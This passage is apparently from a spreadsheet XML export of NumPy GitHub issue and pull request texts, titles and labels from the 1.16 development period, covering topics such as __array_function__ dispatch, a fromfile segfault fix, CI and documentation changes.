While trying to modify the header files related to sorting algorithms I find `numpy/core/src/common/npy_sort.h` is verbose and hard-coded. It might be a better idea to use a template `numpy/core/src/common/npy_sort.h.src` (the main part of this PR) to generate the file when building  numpy._x000D_
BTW some lines in `.gitignore` labeled as `# Things specific to this project #_x000D_
` seem outdated. Maybe this should be filed in another issue?</t>
  </si>
  <si>
    <t>MAINT: Refactor sorting header file</t>
  </si>
  <si>
    <t>Closes https://github.com/scipy/scipy/issues/9452</t>
  </si>
  <si>
    <t>MAINT: update gfortran RPATH for AIX/Windows non-support.</t>
  </si>
  <si>
    <t>Per discussion on the mailing list, `__array_function__` isn't quite ready to release as part of NumPy 1.16:_x000D_
https://mail.python.org/pipermail/numpy-discussion/2018-November/078949.html_x000D_
_x000D_
We'd like to improve performance a bit, and it will be easier to support introspection on NumPy functions if we support Python 3 only._x000D_
_x000D_
So for now, you need to set the environment variable ``NUMPY_EXPERIMENTAL_ARRAY_FUNCTION=1`` to enable dispatching.</t>
  </si>
  <si>
    <t>MAINT: disable `__array_function__` dispatch unless environment variable set</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: __array_function__']</t>
  </si>
  <si>
    <t>WIP, REL: Prepare 1.16</t>
  </si>
  <si>
    <t>['14 - Release', '25 - WIP']</t>
  </si>
  <si>
    <t xml:space="preserve">The following folks need a name and email address for inclusion in the list of NumPy 1.16.0 contributers._x000D_
_x000D_
- [x] @attack68_x000D_
- [x] @cclauss_x000D_
- [ ] @lerbuke_x000D_
- [x] @logeaux_x000D_
- [x] @silenc3r_x000D_
- [x] @tteichmann_x000D_
_x000D_
Could you please comment on this issue with that information so that the numpy mailmap can be updated?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>REL: mailmap entries for 1.16</t>
  </si>
  <si>
    <t>Replaces PR #10931 which it draws heavily from. Fixes #2215. _x000D_
_x000D_
The original PR has a discussion of why this is not the best fix, it assumes a field `('', |Vn)` - where `n` is the void size - is a padding field when someone could theoretically be using such a field for data. It also will force a possibly aligned dtype to now be not aligned, but unfortunately that information is not preserved in the storage format. _x000D_
_x000D_
I think this is the least evil of the possibilities, although we could consider saving the padding fields with a unique name. It would have to be better than the existing choice: `f1`, `f2`, ... which in the original issue clashed with names commonly used by users</t>
  </si>
  <si>
    <t>BUG: test, fix loading structured dtypes with padding</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
    Remove long unused options from pavement.py. There is actually little_x000D_
    left, and what is there could easily be turned into a python script at_x000D_
    this point, but this clarifies what is currently needed._x000D_
    _x000D_
    - Remove Windows installers code_x000D_
    - Remove OS X dmg installers code_x000D_
    - Remove Documentation generation code_x000D_
    - Remove Changelog generation_x000D_
    - Remove unused variables and make pylint happy_x000D_
    - Update RELEASE_WALKTHROUGH to reflect changes_x000D_
    _x000D_
    Also fix a Python 3 bug, the files to be hashed need to be_x000D_
    opened as binary files._x000D_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</si>
  <si>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Cleanup pavement file</t>
  </si>
  <si>
    <t xml:space="preserve">There is a problem with the way in which we handle_x000D_
errors which occur in the call to `PyArray_FromFile`_x000D_
in `np.fromfile`._x000D_
_x000D_
The problem here is twofold._x000D_
_x000D_
 1. The return value isn't checked, therefore if we reach_x000D_
    the fail block, we will attempt a DECREF on a NULL and_x000D_
    go down in flames._x000D_
_x000D_
 2. The cleanup code on the filepointers (most notabily the_x000D_
    call to `npy_PyFile_DupClose2`) assumes that there is no_x000D_
    error set to work._x000D_
_x000D_
This PR addresses these issues_x000D_
 1. By adding a NULL check to the fail block to ensure we don't_x000D_
    attempt a DECREF on a NULL._x000D_
_x000D_
 2. By saving the error state before attempting the cleanup code_x000D_
    on the file descriptor, and then restoring it after._x000D_
_x000D_
Fixes: #12300 </t>
  </si>
  <si>
    <t>BUG: Fix segfault when an error occurs in np.fromfile</t>
  </si>
  <si>
    <t>Fixes #12351 _x000D_
_x000D_
Needed since a [stack overflow answer](https://stackoverflow.com/questions/1987694/how-to-print-the-full-numpy-array) contains wrong information</t>
  </si>
  <si>
    <t>BUG: test, fix for threshold='nan'</t>
  </si>
  <si>
    <t>Activate storage of circleci [doc artifacts](https://circleci.com/docs/2.0/artifacts/) so that devdocs that are built by circleci already can be viewed directly from a link in circleci to inspect changes._x000D_
_x000D_
This is done by SciPy already and tends to help reviewers quickly look at doc changes without having to compile locally. Although I think the links that are generated are initially only visible to core devs, I'm pretty sure they can share the links when critiquing doc changes in PRs, which may help communication on changes there._x000D_
_x000D_
This does cost us 4 minutes of extra time for the uploads, so 7-&gt;11 minutes total for circleci -- should still be shorter than i.e., full test suite runs in other CI jobs though. We could explore breaking out to separate circleci stuff in parallel if we really wanted, but maybe overkill for now._x000D_
_x000D_
Could think about activating the NEP doc artifact storage as well._x000D_
_x000D_
I noticed both sets of artifacts were commented out, which is perhaps my lingering concern here -- maybe someone did think about doing this and consciously decided not to?_x000D_
_x000D_
Sample artifact from a test run on my fork here: https://2-116427166-gh.circle-artifacts.com/0/home/circleci/repo/doc/build/html/index.html</t>
  </si>
  <si>
    <t>TST, DOC: store circleci doc artifacts</t>
  </si>
  <si>
    <t xml:space="preserve">See #10532_x000D_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</si>
  <si>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for np.dtype(ctypes.Structure) does not respect _pack_ field</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</si>
  <si>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That's my first contribution, so I feel quit unsure. </t>
  </si>
  <si>
    <t>DOC: add a docstring for the function 'compare_chararrays' (See #10106)</t>
  </si>
  <si>
    <t>For purposes of testing the new `__array_function__`, I would like for the internal implementation of `array2string` not call `asarray` on ducktypes, so that I can easily reuse this implementation in test ducktypes._x000D_
_x000D_
This has no effect at all on any users: It does not change how ndarrays and ndarray subclasses print, and is only a hidden (not user-visible) internal change.</t>
  </si>
  <si>
    <t>ENH: allow ducktypes to skip asarray in arrayprint.py</t>
  </si>
  <si>
    <t xml:space="preserve">Documentation clearly confusing:_x000D_
https://stackoverflow.com/questions/40689152/what-does-replacement-mean-in-numpy-random-choice_x000D_
_x000D_
Hopefully it is better now._x000D_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</si>
  <si>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clarify 'choice' documentation</t>
  </si>
  <si>
    <t>Clean up description of the Dirichlet distribution. Fixed notation and added some details.</t>
  </si>
  <si>
    <t>DOC: update description of the Dirichlet distribution</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #11458_x000D_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</si>
  <si>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DEV: change ASV benchmarks to run on Python 3.6 by default</t>
  </si>
  <si>
    <t>Try removing `pathlib` from Shippable CI config since apparently  no other NumPy CI config uses this, it is apparently prone to causing issues, and depending on the backport maintenance of a Python 3 standard library module may be a bad idea anyway._x000D_
_x000D_
An alternative may be to switch to the newer `pathlib2` 2.x backport, but I don't think we've done that for any other CI either._x000D_
_x000D_
Maybe good to check the test skip counts for shippable in this PR -- I think for 2.x quite a few more show up without pathlib so that was my original reasoning for using it.</t>
  </si>
  <si>
    <t>TST: test_tofile_fromfile now uses initialized memory</t>
  </si>
  <si>
    <t xml:space="preserve">The Liskov substitution principle suggests it should._x000D_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</si>
  <si>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Allow subclasses in `ndarray.__array_function__`.</t>
  </si>
  <si>
    <t xml:space="preserve">When an `__array_ufunc__` implementation is given the types of the array-like arguments, it seems more logical to include all unique types rather than just those that override `__array_function__`. That way, e.g., if a file handle is passed in as one of the arguments, an implementation can immediately decide it cannot deal with that._x000D_
_x000D_
@shoyer - just so you have an idea how it looks like._x000D_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</si>
  <si>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provide all unique types to __array_function__.</t>
  </si>
  <si>
    <t>DOC: NumPy 1.15.4 post release documentation update.</t>
  </si>
  <si>
    <t xml:space="preserve">Mostly aim to ensure that the most common case, in which the only override class is ndarray, is fast._x000D_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</si>
  <si>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Simple speed-ups for getting overloaded types</t>
  </si>
  <si>
    <t xml:space="preserve">- Create release notes_x000D_
- Create changelog_x000D_
- Update release index_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Prepare for the NumPy 1.15.4 release</t>
  </si>
  <si>
    <t>**TL,DR:** This significantly speeds up dispatch for `__array_function__`, reducing the overhead down to about 0.7 microseconds for typical cases (vs 2-3 microseconds currently with a pure Python implementation). For functions that handle many arguments (like `concatenate`), this reduces the overhead of dispatching by something like 100x, i.e., from "makes concatenate 4x slower" to "barely unnoticeable"._x000D_
_x000D_
Original post:_x000D_
_x000D_
-----------------------------------------------_x000D_
_x000D_
Still needs:_x000D_
- [x] documentation for the C functions_x000D_
- [x] actually using the C functions in np.core.overrides_x000D_
- [x] some way to test get_overloaded_types_and_args directly (a Python wrapper for testing?)_x000D_
_x000D_
Currently NumPy doesn't even import properly after I build it with this change. Hopefully I'm doing something obviously wrong!_x000D_
```_x000D_
Original error was: dlopen(/Users/shoyer/dev/numpy/build/testenv/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so, 2): Symbol not found: _array_function_implementation_or_override_x000D_
  Referenced from: /Users/shoyer/dev/numpy/build/testenv/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so_x000D_
  Expected in: flat namespace_x000D_
 in /Users/shoyer/dev/numpy/build/testenv/lib/python3.7/site-packages/numpy/core/_multiarray_umath.cpython-37m-darwin.so_x000D_
```_x000D_
_x000D_
Also: I expect it's obvious, but I'm pretty new to C and Python's C-API. I expect there are lots of ways this PR could be improved.</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: __array_function__', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Use [vulture](https://github.com/jendrikseipp/vulture) to check for unreachable code paths in NumPy Python modules by parsing the abstract syntax tree._x000D_
_x000D_
Fix up the single such case in our code base, with the confirmed lack of hit visible in [codecov missing line](https://codecov.io/gh/numpy/numpy/src/master/numpy/f2py/capi_maps.py#L724)._x000D_
_x000D_
The enclosing conditional is basically an `if 1:`._x000D_
_x000D_
codecov should prevent this category of issue moving forward, but we sometimes have to ignore codecov for various reasons, so maybe doesn't hurt to have this static check which runs in &lt; 5 seconds.</t>
  </si>
  <si>
    <t>MAINT, TST: unreachable Python code paths</t>
  </si>
  <si>
    <t>Motivated by https://github.com/numpy/numpy/pull/12120#issuecomment-429203723_x000D_
_x000D_
Add support for floor division between `timedelta64` operands with type signature: `mm-&gt;q`_x000D_
_x000D_
~I tried `mm-&gt;q` for closer mimic with built-in timedelta, but that makes it tricky to handle `NaT-&gt; NaN`.~_x000D_
_x000D_
Maybe there's a cleaner / more efficient way to deal with negative values.</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: numpy.datetime64']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please be sure you are following the instructions in the dev guidelines_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html_x000D_
--&gt;_x000D_
_x000D_
Fixes #12294._x000D_
_x000D_
&lt;!-- We'd appreciate it if your commit message is properly formatted_x000D_
http://www.numpy.org/devdocs/dev/gitwash/development_workflow.html#writing-the-commit-message_x000D_
--&gt;_x000D_
</t>
  </si>
  <si>
    <t>DOC: correct the default value of `optimize` in `numpy.einsum`</t>
  </si>
  <si>
    <t>['04 - Documentation', '08 - Backport', 'component: numpy.core']</t>
  </si>
  <si>
    <t>Suggested as useful in https://github.com/numpy/numpy/pull/12299#issuecomment-434800288_x000D_
_x000D_
~Across various Python versions in "32-bit" build scenario used here the full &amp; fast test suites both consistently stall at `numpy/core/tests/test_ufunc.py::TestUfunc::test_keepdims_argument`.~_x000D_
_x000D_
~I'm certainly open to suggestions--I've spent a few hours trying to get this going and may very well just be missing something silly. The approach combines some of the stuff suggested in our Travis tools files for recent Ubuntu 32-bit builds, but most strongly tries to follow what `numba` seems to do for 32-bit linux Azure builds.~</t>
  </si>
  <si>
    <t>TST: add 32-bit linux Azure CI job</t>
  </si>
  <si>
    <t xml:space="preserve">when i use np.arange(0, 1, 0.1)，i get a list has overflow value like '0.30000000000000004'。_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
for i in np.arange(0, 1,0.1):_x000D_
    print i_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
0.0_x000D_
0.1_x000D_
0.2_x000D_
0.30000000000000004_x000D_
0.4_x000D_
0.5_x000D_
0.6000000000000001_x000D_
0.7000000000000001_x000D_
0.8_x000D_
0.9_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.14.3 2.7.15 |Anaconda, Inc.| (default, May  1 2018, 18:37:09) [MSC v.1500 64 bit (AMD64)]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>np.arange result overflow</t>
  </si>
  <si>
    <t xml:space="preserve">Fix for #5300 and a different approach to deprecation which is proposed here: #12244 </t>
  </si>
  <si>
    <t>DOC: Update the docstring of asfortranarray and ascontiguousarray</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
`fromfile` invalid data and sometimes segfault if reading past the end of a file i.e. it does not check if reading will go past the file end. This issue leads to a segfault on Ubuntu 16.04, but seems to not segfault on OSX._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
def test_read_from_file():_x000D_
    # create an empty file named `empty.bin`_x000D_
    filename = 'empty.bin'_x000D_
    open(filename, 'a').close()_x000D_
_x000D_
    # read large chunk of data, past the end of the file_x000D_
    dtype = [('data', '&lt;f4', 500,)]_x000D_
    count = 100000000_x000D_
_x000D_
    with open(filename, 'rb') as fh:_x000D_
        data = np.fromfile(fh, dtype, count)_x000D_
_x000D_
    print(data.shape)_x000D_
```_x000D_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Process finished with exit code 139 (interrupted by signal 11: SIGSEGV)_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
platform linux -- Python 3.6.6, pytest-3.8.2, py-1.6.0, pluggy-0.7.1_x000D_
</t>
  </si>
  <si>
    <t>Invalid data and segfault when reading past the size of file with fromfile on Ubuntu 16.04</t>
  </si>
  <si>
    <t>The chroot travis test used python2. Update it to use python3.</t>
  </si>
  <si>
    <t>BUILD: use system python3 in the chroot</t>
  </si>
  <si>
    <t>It shows `Publish test results for Python $(python.version)`, rather than actually interpolating the version.</t>
  </si>
  <si>
    <t>TST: Azure test status reporting has poorly-interpolated title</t>
  </si>
  <si>
    <t xml:space="preserve">The type of the fill_value needs to be `bool_` in order to match_x000D_
the result type of `==` and `!=`._x000D_
    _x000D_
Closes #12248._x000D_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</si>
  <si>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fill value in masked array '==' and '!=' ops.</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #12249._x000D_
_x000D_
Fixes #12122._x000D_
_x000D_
577dbbd, added in 2009 for numpy 1.5 to fix TRAC issue 1312 worked around a deficiency in that "PyArg_ParseTuple("s#", ...) refuses to return a buffer if bf_releasebuffer is present". That changeset never released a buffer_info_cache entry for a scalar. This fixes that problem. Note also cpython issue 24009 where they discuss deprecating "s#" parsing._x000D_
_x000D_
It is difficult to test this fix since the cache keys are id(value) and the cache is static in buffer.c. We should revisit the need for the cache, it seems like there should be a better way._x000D_
_x000D_
Edit: note that the issue number predates github, formatting_x000D_
_x000D_
_x000D_
* BUG: clear buffer_info_cache on scalar dealloc_x000D_
_x000D_
* MAINT: preemptively call _array_dealloc_buffer_info as soon as possible_x000D_
_x000D_
* BUG: also remove cached info for scalars_x000D_
_x000D_
* MAINT: refactor _array_dealloc_buffer_info-&gt; _dealloc_cached_buffer_info_x000D_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</si>
  <si>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Dealloc cached buffer info (#12249)</t>
  </si>
  <si>
    <t>Adds the open source [cppcheck static code analyzer](https://github.com/danmar/cppcheck) to an Azure CI job &amp; parses a subset of the issues that can be detected for now using `grep` exit codes for success, a bit like our compiler warning checks._x000D_
_x000D_
This PR also includes the attempted fixes to satisfy the above subset of the static analysis checks, and the [raw static analysis log file](https://github.com/numpy/numpy/files/2531900/cppcheck_results.txt) contains more issues with tags in parentheses like `(performance)`, `(portability)` and so on._x000D_
_x000D_
The full static analysis job is a few minutes faster than the full test suite jobs, with `cppcheck` itself requiring around 6 minutes to recursively probe our codebase with all flags active._x000D_
_x000D_
There are some corners of our codebase like `lapack_lite`, `swig`, and `random` for which I've intentionally avoided diving in too much, at least for now, despite the static analyzer going nuts on those.</t>
  </si>
  <si>
    <t>WIP, TST: add static analysis to CI</t>
  </si>
  <si>
    <t>['05 - Testing', '25 - WIP', '55 - Needs work']</t>
  </si>
  <si>
    <t>Static analysis caught a few unused C variables here.</t>
  </si>
  <si>
    <t>MAINT: removed unused vars in f2py test code</t>
  </si>
  <si>
    <t xml:space="preserve">A minor syntax fix detected using the `cppcheck` static code analyzer. I'm sure there's a good reason this doesn't cause major errors in current compilation (older C std or something?)._x000D_
_x000D_
I was hoping to use static analysis to facilitate detection of "dead code" / unused functions but so far it produces a lot of false positives for various reasons, especially because of our custom template syntax / language._x000D_
</t>
  </si>
  <si>
    <t>MAINT: `_set_out_array()` syntax fix</t>
  </si>
  <si>
    <t>Use cython &gt;= 0.29 for the LGTM analysis. Part of #12284</t>
  </si>
  <si>
    <t>BUILD: force LGTM to use cython&gt;=0.29</t>
  </si>
  <si>
    <t>If a user does not define `NPY_NO_DEPRECATED_API`, we emit a warning encouraging them to choose an api version. If they choose `NPY_1_7_API_VERSION` or earlier, we include a special header with many old API interfaces. This is still needed for correct operation with cython, see cython/cython#2640 for a possible solution. Until we can truly deprecate the old APIs (or decide to revert the deprecation), choosing the old API should not emit a compiler warning.</t>
  </si>
  <si>
    <t>ENH: Do not emit compiler warning if forcing old API</t>
  </si>
  <si>
    <t>`np.take` is significantly slower for non-writeable input arrays due to requesting `NPY_ARRAY_CARRAY` instead of `NPY_ARRAY_CARRAY_RO` from `PyArray_CheckAxis`.  _x000D_
_x000D_
Before:_x000D_
```_x000D_
In [8]: import numpy as np_x000D_
_x000D_
In [9]: a = np.arange(1e8)_x000D_
_x000D_
In [10]: %timeit a.take([5])_x000D_
1.64 µs ± 80 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
_x000D_
In [11]: a.setflags(write=False)_x000D_
_x000D_
In [12]: %timeit a.take([5])_x000D_
1.41 s ± 17.4 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)_x000D_
```_x000D_
After:_x000D_
```_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]:  a = np.arange(1e8)_x000D_
_x000D_
In [3]: %timeit a.take([5])_x000D_
1.53 µs ± 18.2 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
_x000D_
In [4]: a.setflags(write=False)_x000D_
_x000D_
In [5]: %timeit a.take([5])_x000D_
1.55 µs ± 22.6 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each)_x000D_
```</t>
  </si>
  <si>
    <t>ENH: array does not need to be writable to use as input to take</t>
  </si>
  <si>
    <t>Fixes #11803_x000D_
_x000D_
Adds our own `numpy.pxd`, copied from the cython `__init__.pxd`. It will only be used if the numpy include path from `numpy.get_includes()` is added to the cython compile flags, otherwise the cython one will still be used._x000D_
_x000D_
Modifications were needed to `mtrand.pyx` since `ndarray.shape` is a C `npy_intp` in the newer `numpy.pxd`, not a python-level sequence attribute.</t>
  </si>
  <si>
    <t>ENH: supply our version of numpy.pxd, requires cython&gt;=0.29</t>
  </si>
  <si>
    <t>['01 - Enhancement', 'component: build', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes #12263_x000D_
_x000D_
We can't support generators with dispatch for ``__array_function__``._x000D_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</si>
  <si>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DEP: deprecate passing a generator to stack functions</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: __array_function__']</t>
  </si>
  <si>
    <t>This informational NEP was discussed on the mailing list and in PR #12166.</t>
  </si>
  <si>
    <t>NEP: tweak and mark NEP 0027 as final</t>
  </si>
  <si>
    <t>The C [`parse_index()`](https://github.com/numpy/numpy/blob/master/numpy/core/src/multiarray/iterators.c#L100) function is not only completely [uncovered by tests](https://codecov.io/gh/numpy/numpy/src/master/numpy/core/src/multiarray/iterators.c#L100), but its last usage in our code base was more than 5 years ago--removed by @seberg in 607863d based on my bisection analysis._x000D_
_x000D_
I found no evidence that this function is registered in the C API -- this PR proposes removing both its source and header prototype declaration.</t>
  </si>
  <si>
    <t>MAINT: remove unused parse_index()</t>
  </si>
  <si>
    <t>Creating the issue to remind myself. There were some behavior tweaks / improvements in #12254 that probably ought to make the release notes</t>
  </si>
  <si>
    <t>DOC: Add a release note for the more rigorous ctype support added in 12254</t>
  </si>
  <si>
    <t>Closes #12223, see rational there.</t>
  </si>
  <si>
    <t>DOC: add broadcasting article from scipy old-wiki</t>
  </si>
  <si>
    <t>The [docstring of numpy.equal](https://www.numpy.org/devdocs/reference/generated/numpy.equal.html#numpy-equal) says that the input arrays should be of the same shape. I think this is wrong as broadcasting will be used and no error is returned if you use two input arrays with different shapes._x000D_
_x000D_
Besides the second example does not compare two arrays._x000D_
```python_x000D_
&gt;&gt;&gt; np.equal(1, np.ones(1))_x000D_
array([ True])_x000D_
```</t>
  </si>
  <si>
    <t>DOC The docstring of numpy.equal is misleading</t>
  </si>
  <si>
    <t xml:space="preserve">Relates to gh-12063_x000D_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</si>
  <si>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Avoid SystemErrors by checking the return value of PyPrint</t>
  </si>
  <si>
    <t>As reported by @ilayn over in https://github.com/numpy/numpy/issues/12262:_x000D_
_x000D_
&gt; There are other backwards incompatible changes for hstack and column_stack which were explicitly accepting generator expressions but now they don't._x000D_
&gt;_x000D_
&gt; Xref : scipy/scipy#9405</t>
  </si>
  <si>
    <t>BUG? hstack/vstack/column_stack no longer accept generators</t>
  </si>
  <si>
    <t>['priority: high']</t>
  </si>
  <si>
    <t>In #12057 the linspace is removed from the imports from `core` however this broke various concatenation code in SciPy. The AxesConcetananenantatotator (it's impossible to type) has a method call specifically for linspace and hence trips up._x000D_
_x000D_
https://github.com/numpy/numpy/blob/872372bd56ccb5fe98faae8be7d14e4a8c69e037/numpy/lib/index_tricks.py#L349_x000D_
_x000D_
_x000D_
There are other backwards incompatible changes for `hstack` and `column_stack` which were explicitly accepting generator expressions but now they don't. _x000D_
_x000D_
Xref : scipy/scipy#9405_x000D_
_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
The simplest would be _x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.r_[0:36:100j]_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
_x000D_
  File "&lt;ipython-input-62-500dc46d81ee&gt;", line 1, in &lt;module&gt;_x000D_
    np.r_[0:5:10j]_x000D_
_x000D_
  File "c:\...\appdata\local\programs\python\python36\lib\site-packages\numpy-1.16.0.dev0+872372b-py3.6-win-amd64.egg\numpy\lib\index_tricks.py", line 349, in __getitem___x000D_
    newobj = function_base.linspace(start, stop, num=size)_x000D_
_x000D_
AttributeError: module 'numpy.lib.function_base' has no attribute 'linspace'_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
_x000D_
```_x000D_
1.16.0.dev0+872372b 3.6.5 (v3.6.5:f59c0932b4, Mar 28 2018, 17:00:18) [MSC v.1900 64 bit (AMD64)]_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Missing linspace import breaks concatenation funcs</t>
  </si>
  <si>
    <t>Our documentation repeats information. The `PyArray_SimpleNew` family of functions is documented both in the [user section](https://docs.scipy.org/doc/numpy-1.15.1/user/c-info.how-to-extend.html#creating-a-brand-new-ndarray) and in the [reference section](https://docs.scipy.org/doc/numpy-1.15.1/reference/c-api.array.html#creating-arrays)._x000D_
_x000D_
Also, the [distutils section](https://docs.scipy.org/doc/numpy-1.15.1/reference/distutils.html) should be moved to user, not reference, and cleaned up._x000D_
_x000D_
See also #12250</t>
  </si>
  <si>
    <t>DOC: refactor information in user and reference sections of the docs</t>
  </si>
  <si>
    <t xml:space="preserve">xref: https://github.com/numpy/numpy/pull/11971#discussion_r227640632_x000D_
cc: @eric-wieser </t>
  </si>
  <si>
    <t>TST: simplify how the different code paths for block are tested.</t>
  </si>
  <si>
    <t>The [ufunc reference](https://docs.scipy.org/doc/numpy-1.15.1/reference/ufuncs.html) contains the following notes about `out` and `where` usage:_x000D_
_x000D_
&gt; If ‘out’ is None (the default), a uninitialized return array is created. The output array is then filled with the results of the ufunc in the places that the broadcast ‘where’ is True. If ‘where’ is the scalar True (the default), then this corresponds to the entire output being filled. **Note that outputs not explicitly filled are left with their uninitialized values.**_x000D_
_x000D_
and_x000D_
_x000D_
&gt; Note that if an uninitialized return array is created, values of False will leave those values uninitialized._x000D_
_x000D_
I understand why the API is like this, and that there are legitimate use cases that prevent unnecessary initialization. But it would be nice to also have this warning on the specific functions, like [np.divide](https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.divide.html) etc. - especially because this is a construct where an innocent looking statement may result in non-deterministic behavior._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>ufuncs: warn about leaving values uninitialized</t>
  </si>
  <si>
    <t>['04 - Documentation', '50 - Duplicate']</t>
  </si>
  <si>
    <t>Follows in the vein of #10602._x000D_
_x000D_
A step towards fixing #12207._x000D_
_x000D_
---_x000D_
This comes with a number of changes:_x000D_
_x000D_
* Propagating the error if parsing a ctypes object goes wrong, rather than silencing it and trying more things._x000D_
* Rejecting ctypes bitfields, which were incorrectly treated as subarrays._x000D_
* Rejecting ctypes Unions, which were previously treated as if they were structs_x000D_
* Rejecting ctypes pointers, which were silently converted into their dereferenced types._x000D_
  This was particularly dangerous behavior when parsing structs with nested pointers, where swapping out the type changes the struct layout!_x000D_
* No longer support ctypes duck-types, which includes..._x000D_
* No longer supporting a `_fields_` attribute on `np.void` subclasses. This was a bug due to a poorly-shared code-path between void and ctypes types._x000D_
_x000D_
The upshot is it should be easier to fix future problems in parsing ctypes types.</t>
  </si>
  <si>
    <t>MAINT: Move ctype -&gt; dtype conversion to python</t>
  </si>
  <si>
    <t>Related to #9415, ~but using doctests proper--this is pretty painful, although I'm making progress &amp; there are some real issues in the docstrings.~_x000D_
_x000D_
Using this command locally: `python runtests.py -- --doctest-modules --ignore=numpy/ma/version.py --ignore=numpy/f2py/__main__.py --ignore=numpy/distutils/msvc9compiler.py --ignore=numpy/core/generate_numpy_api.py --ignore=numpy/core/cversions.py --ignore=numpy/testing -n 3 &gt;&amp; log.txt`_x000D_
_x000D_
To do:_x000D_
_x000D_
- [x] resolve remaining doctest errors locally_x000D_
- [x] hook up to CI with a 3.x doctest job</t>
  </si>
  <si>
    <t>DOC, TST: enable doctests</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
NumPy can create boolean arrays out of strings, but cannot convert string arrays to bool_. I think we should follow Python here and assign truth values to strings._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import numpy as np_x000D_
&gt;&gt;&gt; np.array('N', dtype='?')_x000D_
array(True)_x000D_
&gt;&gt;&gt; np.array('N').astype('?')_x000D_
Traceback (most recent call last):_x000D_
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
ValueError: invalid literal for int() with base 10: 'N'_x000D_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t>
  </si>
  <si>
    <t>Should be able to convert string arrays to bool_</t>
  </si>
  <si>
    <t>Fixes #12213_x000D_
_x000D_
Before:_x000D_
```_x000D_
In [1]: import numpy as np_x000D_
_x000D_
In [2]: class MyArray:_x000D_
   ...:     def __array_function__(*args, **kwargs):_x000D_
   ...:         return NotImplemented_x000D_
   ...:_x000D_
_x000D_
In [3]: np.sum(MyArray())_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-3-c8a80bb1d37e&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.sum(MyArray())_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in public_api(*args, **kwargs)_x000D_
    149             relevant_args = dispatcher(*args, **kwargs)_x000D_
    150             return array_function_implementation_or_override(_x000D_
--&gt; 151                 implementation, public_api, relevant_args, args, kwargs)_x000D_
    152_x000D_
    153         # TODO: remove this when we drop Python 2 support (functools.wraps_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in array_function_implementation_or_override(implementation, public_api, relevant_args, args, kwargs)_x000D_
    108     raise TypeError('no implementation found for {} on types that implement '_x000D_
    109                     '__array_function__: {}'_x000D_
--&gt; 110                     .format(public_api, list(map(type, overloaded_args))))_x000D_
    111_x000D_
    112_x000D_
_x000D_
TypeError: no implementation found for &lt;function sum at 0x10e070bf8&gt; on types that implement __array_function__: [&lt;class '__main__.MyArray'&gt;]_x000D_
```_x000D_
After:_x000D_
```_x000D_
In [3]: np.sum(MyArray())_x000D_
---------------------------------------------------------------------------_x000D_
TypeError                                 Traceback (most recent call last)_x000D_
&lt;ipython-input-3-c8a80bb1d37e&gt; in &lt;module&gt;()_x000D_
----&gt; 1 np.sum(MyArray())_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in public_api(*args, **kwargs)_x000D_
    149             relevant_args = dispatcher(*args, **kwargs)_x000D_
    150             return array_function_implementation_or_override(_x000D_
--&gt; 151                 implementation, public_api, relevant_args, args, kwargs)_x000D_
    152_x000D_
    153         # TODO: remove this when we drop Python 2 support (functools.wraps_x000D_
_x000D_
~/dev/numpy/numpy/core/overrides.py in array_function_implementation_or_override(implementation, public_api, relevant_args, args, kwargs)_x000D_
    108     raise TypeError('no implementation found for {} on types that implement '_x000D_
    109                     '__array_function__: {}'_x000D_
